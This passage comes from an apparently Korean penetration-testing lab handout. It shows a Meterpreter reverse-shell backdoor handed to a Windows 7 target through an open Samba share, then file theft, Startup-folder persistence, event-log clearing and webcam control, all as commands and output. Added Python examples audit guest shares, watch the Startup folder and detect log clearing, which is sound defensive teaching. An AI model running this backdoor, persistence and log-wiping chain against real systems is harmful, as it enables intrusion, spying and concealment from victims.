Saved as: reverse_test.exe
-> For LHOST, enter the attacker's own IP address. Kali has both 192.168.10.50 and 192.168.20.50 (see the ifconfig output above); the command uses 192.168.20.50, the interface on the same network as the Windows 7 target.
-> When the generated reverse_test.exe file is run on the target system, the attacking system ends up in the same position as if it had penetrated the target system.
# ls
reverse_resource.rc reverse_test.exe
reverse_resource.rc (Kali Linux) msfconsole commands
reverse_test.exe (Windows 7) backdoor
# file *
reverse_resource.rc: ASCII text
reverse_test.exe: PE32+ executable (GUI) x86-64, for MS Windows
③ Copy the reverse_test.exe file to the target system (Windows 7)
(Assumption) Assume that the reverse_test.exe file has been copied to the target PC (Windows 7) by one of several possible methods.
■ SAMBA(http://www.samba.org)
Windows : CIFS/SMB
Linux/Unix : NFS
(Kali Linux) Share the /share directory through the Samba server.
(Windows 7) Connect to the shared directory (\\192.168.20.50).
(KaliLinux)
# mkdir /share
# chmod 777 /share
# cp reverse_test.exe /share
# vi /etc/samba/smb.conf
..... (omitted) .....
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[share]
comment = Kali Linux Shared Directory
path = /share
browseable = yes
read only = no
writable = yes
public = yes
-> Add the new content at the very bottom of the file.
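The [share] definition above is deliberately wide open for the lab: `public = yes` (a synonym for `guest ok`) lets anyone connect without credentials, and `read only = no` / `writable = yes` lets them write. On a real file server that combination is exactly what a reviewer should hunt for. The added example below (my own code, not from the page or from the Samba project) parses an smb.conf and reports every share that is guest-accessible, distinguishing guest-writable from guest-readable. It relies on two Samba synonym rules that I am confident of: `public` means `guest ok`, and `writable`/`writeable` are the inverse of `read only`, with the last one set winning. The sample configuration is constructed for this example in the shape of the page's file.

```python
import configparser

# Constructed smb.conf (not the page's file): Debian-style defaults plus one
# wide-open share, mirroring the lab configuration above.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
;  write list = root, @lpadmin

[share]
   comment = Kali Linux Shared Directory
   path = /share
   browseable = yes
   read only = no
   writable = yes
   public = yes

[homes]
   comment = Home Directories
   browseable = no
   read only = yes
   guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1"}


def load_smb_conf(text):
    """Parse smb.conf text with configparser.

    Indentation is stripped first: configparser would otherwise treat an indented
    line as a continuation of the previous value. Samba allows duplicate keys, so
    strict mode is off; interpolation is off because Samba uses %-macros.
    """
    flat = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(flat)
    return cp


def share_is_writable(section):
    """'read only' and 'writable'/'writeable' are inverse synonyms; last one wins."""
    writable = False  # Samba default: read only = yes
    for key, value in section.items():
        if key == "read only":
            writable = value.strip().lower() not in TRUE_VALUES
        elif key in ("writable", "writeable"):
            writable = value.strip().lower() in TRUE_VALUES
    return writable


def share_is_guest_accessible(section):
    """'guest ok' and 'public' are synonyms; either set to yes opens the share."""
    for key, value in section.items():
        if key in ("guest ok", "public") and value.strip().lower() in TRUE_VALUES:
            return True
    return False


def audit_shares(text):
    """Return [(share, path, finding)] for every guest-accessible share."""
    cp = load_smb_conf(text)
    findings = []
    for name in cp.sections():
        if name == "global":
            continue
        sec = cp[name]
        if share_is_guest_accessible(sec):
            kind = "guest-writable" if share_is_writable(sec) else "guest-readable"
            findings.append((name, sec.get("path", ""), kind))
    return findings


if __name__ == "__main__":
    for share, path, finding in audit_shares(SAMPLE_SMB_CONF):
        print(f"[{share}] path={path!r}: {finding}")
```

A guest-writable share is a drop point for anyone on the network and, as the lab shows, a convenient way to stage an executable next to a user who will double-click it. Run the audit against the real /etc/samba/smb.conf after any change, and pair it with `testparm -s`, which prints the effective configuration with Samba's own defaults applied.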
# service smbd status
● smbd.service - LSB: start Samba SMB/CIFS daemon (smbd)
Loaded: loaded (/etc/init.d/smbd)
Active: inactive (dead)
# service smbd start
# service smbd status
● smbd.service - LSB: start Samba SMB/CIFS daemon (smbd)
Loaded: loaded (/etc/init.d/smbd)
Active: active (running) since 수 2015-11-04 12:04:45 KST; 4s ago
Process: 7310 ExecStart=/etc/init.d/smbd start (code=exited, status=0/SUCCESS)
CGroup: /system.slice/smbd.service
├─7319 /usr/sbin/smbd -D
└─7321 /usr/sbin/smbd -D
11월 04 12:04:45 kali smbd[7310]: Starting SMB/CIFS daemon: smbd.
nmbd daemon: NetBIOS support
smbd daemon: SMB support
# smbclient -L localhost -N
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.6-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share Disk Kali Linux Share Directory
IPC$ IPC IPC Service (Samba 4.0.6-Debian)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.6-Debian]
Server Comment
--------- -------
KALI Samba 4.0.6-Debian
SOLDESK-PC
Workgroup Master
--------- -------
WORKGROUP
(windows7)
Connect to the shared directory and copy the file to the local machine.
\\192.168.20.50\share\reverse_test.exe ---> copy to the Desktop
(KaliLinux)
# cd /root/bin
# msfconsole -r reverse_resource.rc
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.50:4444
[*] Starting the payload handler...
msf exploit(handler) >
-> Wait until reverse_test.exe is run on Windows 7.
(windows7)
Run the reverse_test.exe program.
(KaliLinux)
Check the messages on Kali Linux
[*] Sending stage (770048 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49169) at
2014-07-20 16:41:39 +0900
[deprecated] I18n.enforce_available_locales will default to true in the future. If you really want to skip validation of your locale you can set I18n.enforce_available_locales =
false to avoid this message.
<ENTER>
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:4444 ->
192.168.20.202:49175 (192.168.20.202)
msf exploit(handler) > sessions -i 1 /* 1 is the session number. */
[*] Starting interaction with 1...
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > sysinfo
Computer : SOLDESK-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : ko_KR
Meterpreter : x86/win32
meterpreter> ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:67:82:7c
MTU : 1500
IPv4 Address : 192.168.20.202
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::888c:d406:3aa8:5513
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
Interface 13
============
Name : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : 2001:0:9d38:90d7:c41:3f24:3f57:eb35
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::c41:3f24:3f57:eb35
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.20.100 266 11
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.20.0 255.255.255.0 192.168.20.202 266 11
192.168.20.202 255.255.255.255 192.168.20.202 266 11
192.168.20.255 255.255.255.255 192.168.20.202 266 11
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 192.168.20.202 266 11
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 192.168.20.202 266 11
No IPv6 routes were found.
meterpreter > getuid
Server username: soldesk-PC\soldesk
meterpreter > pwd
C:\Users\soldesk\Desktop
meterpreter> lpwd
/root/bin
meterpreter > ls
Listing: C:\Users\soldesk\Desktop
=================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2014-07-18 20:11:38 +0900 .
40777/rwxrwxrwx 0 dir 2014-07-04 17:46:19 +0900 ..
100666/rw-rw-rw- 1379 fil 2014-07-09 22:12:02 +0900 Internet Explorer.lnk
40777/rwxrwxrwx 0 dir 2014-07-08 13:56:03 +0900 Security
100666/rw-rw-rw- 446 fil 2014-07-09 22:12:02 +0900 desktop.ini
100777/rwxrwxrwx 73802 fil 2014-07-20 16:37:01 +0900 reverse_test.exe
meterpreter > download /* check the usage of the download command */
Usage: download [options] src1 src2 src3 ... destination
Downloads remote files and directories to the local machine.
OPTIONS:
-h Help banner.
-r Download recursively.
meterpreter > download -r Security /root/bin
[*] downloading: Security\Thunderbird Setup 3.1.7.exe -> /root/bin/Thunderbird Setup 3.1.7.exe
[*] downloaded : Security\Thunderbird Setup 3.1.7.exe -> /root/bin/Thunderbird Setup 3.1.7.exe
-> Check the downloaded file yourself.
meterpreter> pwd
C:\Users\soldesk\Desktop
meterpreter > cd ..
meterpreter> pwd
C:\Users\soldesk
meterpreter > cd AppData
meterpreter > cd Roaming
meterpreter > cd Microsoft
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft
meterpreter > cd Windows
meterpreter > cd "Start Menu"
meterpreter > cd Programs
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
meterpreter > cd Startup
meterpreter > pwd
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > upload reverse_test.exe .
[*] uploading : reverse_test.exe -> .
[*] uploaded : reverse_test.exe -> .\reverse_test.exe
-> Check the uploaded program in Windows.
-> Start > All Programs > Startup
meterpreter> reboot
Rebooting...
meterpreter >
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
msf exploit(handler) > quit
-> Startup folder location:
C:\Users\soldesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
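Dropping an executable into the per-user Startup folder is persistence: the program runs at every logon, as the second msfconsole session below confirms. The defensive counterpart is to baseline that folder and alert on anything new or modified. The added example below (my own code, not from the page or from Metasploit) snapshots a folder's regular files with their sizes and SHA-256 hashes and diffs two snapshots. `user_startup_folder()` derives the path shown above from the APPDATA environment variable on a real Windows host; `demo()` builds a constructed temporary folder, so the code also runs on Linux, and the "executable" it writes is a few placeholder bytes, not a program.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def user_startup_folder():
    """Per-user Startup folder (the path shown above), derived from APPDATA.

    Returns None when APPDATA is not set, e.g. when this runs on Linux.
    """
    appdata = os.environ.get("APPDATA")
    if not appdata:
        return None
    return Path(appdata) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"


def sha256_of(path):
    """SHA-256 hex digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(folder):
    """Map file name -> (size, sha256) for every regular file directly in folder."""
    folder = Path(folder)
    return {p.name: (p.stat().st_size, sha256_of(p))
            for p in sorted(folder.iterdir()) if p.is_file()}


def diff_snapshots(baseline, current):
    """Return (added, changed, removed) between two snapshots."""
    added = {n: v for n, v in current.items() if n not in baseline}
    changed = {n: v for n, v in current.items() if n in baseline and baseline[n] != v}
    removed = [n for n in baseline if n not in current]
    return added, changed, removed


def demo():
    """Constructed scenario: a folder holding only desktop.ini, then a new .exe appears."""
    with tempfile.TemporaryDirectory() as d:
        folder = Path(d)
        (folder / "desktop.ini").write_bytes(b"[.ShellClassInfo]\r\n")
        baseline = snapshot(folder)  # taken on a known-good day
        # Stand-in for an unexpected executable: constructed bytes, not a real program.
        (folder / "reverse_test.exe").write_bytes(b"MZ" + b"\x00" * 62)
        added, changed, removed = diff_snapshots(baseline, snapshot(folder))
        return sorted(added), sorted(changed), removed


if __name__ == "__main__":
    target = user_startup_folder()
    if target is not None and target.is_dir():
        print("current Startup folder:", snapshot(target))
    print("demo diff (added, changed, removed):", demo())
```

Store the baseline somewhere the interactive user cannot rewrite (the attacker in the lab runs with that user's rights), and apply the same snapshot/diff to the machine-wide Startup folder under ProgramData and to the Run/RunOnce registry keys, which serve the same purpose.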
# msfconsole -r reverse_resource.rc
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.50:4444
[*] Starting the payload handler...
msf exploit(handler) >
-> If the target PC (Windows 7) was already booted, force a reboot of Windows 7.
(Windows 7) Log in as the soldesk user.
The malicious program will run at login.
(KaliLinux)
msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49161) at
2014-07-20 17:50:09 +0900
<ENTER>
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:4444 ->
192.168.20.202:49161 (192.168.20.202)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
-> The connection back to Kali Linux is re-established.
-> From here on, practice the remaining tasks freely.
[Lab] Make a work scenario and work through it.
- Run various commands.
---------------------------------- lab section under revision -----------------------------
(Windows 7) Checking the logs
Start > Control Panel > Administrative Tools > Event Viewer
> Windows Logs > System
(Kali Linux)
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log=client.sys.eventlog.open('system')
=> #<#<Class:0xaa23ff0>:0xf22a704 @client=#<Session:meterpreter 192.168.20.202:49161
(192.168.20.202) "soldesk-PC\soldesk @ SOLDESK-PC">, @handle=34865156>
>> log.clear
=> #<#<Class:0xaa23ff0>:0xf22a704 @client=#<Session:meterpreter 192.168.20.202:49161
(192.168.20.202) "soldesk-PC\soldesk @ SOLDESK-PC">, @handle=34865156>
>> quit
meterpreter >
-> In log=client.sys.eventlog.open('system'), the 'system' part can be replaced with
security, system, application, directory service, 'dns server',
'file replication service'
and so on.
-> For reference, see the clrevlogs() function in
/usr/share/metasploit-framework/scripts/meterpreter/winenum.rb.
(Windows 7) Checking the logs
(Note)
Start > Control Panel > Administrative Tools > Event Viewer
> Windows Logs > System
---------------------------------- lab section under revision -----------------------------
[Lab] Make a work scenario and work through it.
-> Test clearing the logs for the others as well: security, system, application, directory service, dns server, file replication service, etc.
-> (Note) Some may not be clearable for lack of privileges. In that case skip those tests and move on to the others.
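A defender-side counterpart to the log-clearing lab above, added here as an example (not from the original notes or from Metasploit): clearing a log through the Windows API leaves a record behind, event ID 104 from the Microsoft-Windows-Eventlog provider (written to the System log, naming the cleared log) and event ID 1102 from the same provider when the Security log is cleared. The event records below are constructed in a JSON-lines shape; the host and account names follow the lab, the times are made up.

```python
# Added example (not part of the original notes): flag Windows event-log clearing
# in an exported event stream. Clearing a log through the Windows API, as the
# meterpreter irb session above does, leaves a record behind: event ID 104
# (provider Microsoft-Windows-Eventlog, System log, message names the cleared
# log) for System/Application and other logs, event ID 1102 (same provider,
# Security log) when the Security log is cleared.
import json
import re
from datetime import datetime

# Constructed sample export, one JSON record per line (the shape log forwarders
# commonly emit). Host and account follow the lab (SOLDESK-PC\soldesk).
SAMPLE_EVENTS = r"""
{"time": "2014-07-20T17:55:01", "channel": "System", "provider": "Service Control Manager", "event_id": 7036, "user": "SYSTEM", "message": "The Windows Update service entered the running state."}
{"time": "2014-07-20T17:58:12", "channel": "System", "provider": "Microsoft-Windows-Eventlog", "event_id": 104, "user": "SOLDESK-PC\\soldesk", "message": "The System log file was cleared."}
{"time": "2014-07-20T17:58:13", "channel": "Security", "provider": "Microsoft-Windows-Eventlog", "event_id": 1102, "user": "SOLDESK-PC\\soldesk", "message": "The audit log was cleared."}
{"time": "2014-07-20T17:58:14", "channel": "System", "provider": "Microsoft-Windows-Eventlog", "event_id": 104, "user": "SOLDESK-PC\\soldesk", "message": "The Application log file was cleared."}
{"time": "2014-07-20T18:01:00", "channel": "Application", "provider": "MsiInstaller", "event_id": 1033, "user": "SOLDESK-PC\\soldesk", "message": "Product installed."}
"""

CLEAR_PROVIDER = "Microsoft-Windows-Eventlog"
CLEAR_MSG = re.compile(r"The (.+?) log file was cleared")


def parse_events(text):
    """Parse a JSON-lines event export; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["time"] = datetime.fromisoformat(rec["time"])
        events.append(rec)
    return events


def find_log_clears(events):
    """Return one hit per cleared log: dict(time, log, event_id, user).

    1102 is only ever raised for the Security log; 104 names the cleared log
    in its message, so the name is taken from there (channel as fallback).
    """
    hits = []
    for e in events:
        if e.get("provider") != CLEAR_PROVIDER:
            continue
        eid = e.get("event_id")
        if eid == 1102:
            log = "Security"
        elif eid == 104:
            m = CLEAR_MSG.search(e.get("message", ""))
            log = m.group(1) if m else e.get("channel")
        else:
            continue
        hits.append({"time": e["time"], "log": log, "event_id": eid,
                     "user": e.get("user")})
    return hits


def clears_by_user(hits, window_seconds=300):
    """Group hits by account when they fall within window_seconds of that
    account's first clear. Several logs wiped in a burst by one account is
    the pattern a scripted wipe (the winenum.rb clrevlogs() style) produces
    and is a stronger signal than a lone administrator clearing one log."""
    groups = {}
    for h in sorted(hits, key=lambda h: h["time"]):
        g = groups.setdefault(h["user"], {"first": h["time"], "logs": []})
        if (h["time"] - g["first"]).total_seconds() <= window_seconds:
            g["logs"].append(h["log"])
    return {user: sorted(g["logs"]) for user, g in groups.items()}


if __name__ == "__main__":
    found = clears_by_user(find_log_clears(parse_events(SAMPLE_EVENTS)))
    for user, logs in found.items():
        print(f"{user} cleared {len(logs)} log(s): {', '.join(logs)}")
```

Because the 104/1102 record is written into a log the attacker can clear again, this check is only reliable on events that were forwarded off the host as they were written.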
[Lab] Webcam control
-> Control the webcam device built into the laptop from Kali Linux.
-> The commands used are as follows.
webcam_list  Retrieves information about the installed webcams.
webcam_start  Selects a webcam from the list and starts it.
webcam_get_frame  Sets the frame value of the picture; used to specify image quality.
webcam_stop  Stops the webcam.
webcam_audio_record  Records audio using the webcam microphone.
-> Discuss the risks for other devices (equipment) as well.
- Smart TVs
- Mobile phones
- Surveillance cameras inside buildings
[Lab] Using Kali Linux 5
[Reference] Taking a Kali Linux snapshot
VMware > VM > Snapshot > Take Snapshot
(Kali Linux)
MSF update
# nslookup www.daum.net
Server: 168.126.63.1
Address: 168.126.63.1#53
Non-authoritative answer:
www.daum.net canonical name = www.g.daum.net.
Name: www.g.daum.net
Address: 117.52.2.238
Name: www.g.daum.net
Address: 117.52.2.237
# msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
[*] Updating to version 4.9.3-2014071601-1kali2
패키지 목록을 읽는 중입니다... 완료
의존성 트리를 만드는 중입니다
상태 정보를 읽는 중입니다... 완료
다음 패키지를 업그레이드할 것입니다:
metasploit metasploit-framework
2개 업그레이드, 0개 새로 설치, 0개 제거 및 110개 업그레이드 안 함.
249 M바이트 아카이브를 받아야 합니다.
이 작업 후 5,627 k바이트의 디스크 공간을 더 사용하게 됩니다.
받기:1 http://http.kali.org/kali/ kali/main metasploit-framework i386 4.9.3-2014071601-1kali2 [68.4 MB]
받기:2 http://http.kali.org/kali/ kali/non-free metasploit i386 4.9.3-2014071601-1kali2 [180 MB]
내려받기 249 M바이트, 소요시간 3분 48초 (1,086 k바이트/초)
Reading changelogs... Done
(데이터베이스 읽는중 ...현재 337773개의 파일과 디렉터리가 설치되어 있습니다.)
metasploit-framework 4.9.2-2014052101-1kali1 패키지를 대체할 준비하는 중입니다
(.../metasploit-framework_4.9.3-2014071601-1kali2_i386.deb 사용) ...
대체되는 metasploit-framework 패키지를 푸는 중입니다 ...
metasploit 4.9.2-2014052101-1kali1 패키지를 대체할 준비하는 중입니다
(.../metasploit_4.9.3-2014071601-1kali2_i386.deb 사용) ...
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
'/usr/bin/msfbinscan의 /usr/bin/msfbinscan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfcli의 /usr/bin/msfcli.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfconsole의 /usr/bin/msfconsole.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfd의 /usr/bin/msfd.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfelfscan의 /usr/bin/msfelfscan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfencode의 /usr/bin/msfencode.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfmachscan의 /usr/bin/msfmachscan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfpayload의 /usr/bin/msfpayload.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfpescan의 /usr/bin/msfpescan.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfrop의 /usr/bin/msfrop.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfrpc의 /usr/bin/msfrpc.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfrpcd의 /usr/bin/msfrpcd.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfupdate의 /usr/bin/msfupdate.framework(으)로 전환, metasploit 패키지'에서 나갑니다
'/usr/bin/msfvenom의 /usr/bin/msfvenom.framework(으)로 전환, metasploit 패키지'에서 나갑니다
대체되는 metasploit 패키지를 푸는 중입니다 ...
metasploit-framework (4.9.3-2014071601-1kali2) 설정하는 중입니다 ...
metasploit (4.9.3-2014071601-1kali2) 설정하는 중입니다 ...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting PostgreSQL 9.1 database server: main.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
[Lab] Using Kali Linux 6
● Download and install Metasploit on Windows (Windows 7).
              +--- (CLI) msfcli CMD : non-interactive
MSF(msfd) ----+--- (CLI) msfconsole CMD : interactive
              +--- (GUI) armitage :
              +--- (GUI) msfgui/msfweb :
The Armitage tool and msfgui
● Armitage is a GUI-based tool developed by Raphael Mudge and is included as one of the tools of Metasploit, the automated attack (assessment) tool.
● It can pick out and select the attacks suited to a service found by scanning, and the options are filled in automatically, so it is a very convenient tool that spares the assessor a lot of deliberation.
● From MSF 4.6 on, Armitage and msfgui are no longer supported in the free version. To use them, therefore, either install them as a separate program in a Windows environment, or consider bringing the modules from an updated MSF into the existing version and upgrading it.
Systems used
- Windows 7
- Firewall
Download the programs from the following sites.
Download the latest msfgui
- http://www.scriptjunkie.us/2013/04/using-the-gui-in-metasploit-4-6/
Download the latest Metasploit (for Windows)
- http://metasploit.com/download
(Note) Temporarily shut down the virus detection tool before installing.
Install the latest Metasploit on Windows.
Check the Internet connection (confirm that communication with the outside is possible).
Download the latest MSF (for Windows) - http://metasploit.com/download
Select the Metasploit Community edition.
Install the msfgui program on Windows.
Download the latest msfgui program
http://www.scriptjunkie.us/2013/04/using-the-gui-in-metasploit-4-6/
[Lab] Using Kali Linux 7
Fast-Track: automated attack tool
● Uses Metasploit modules.
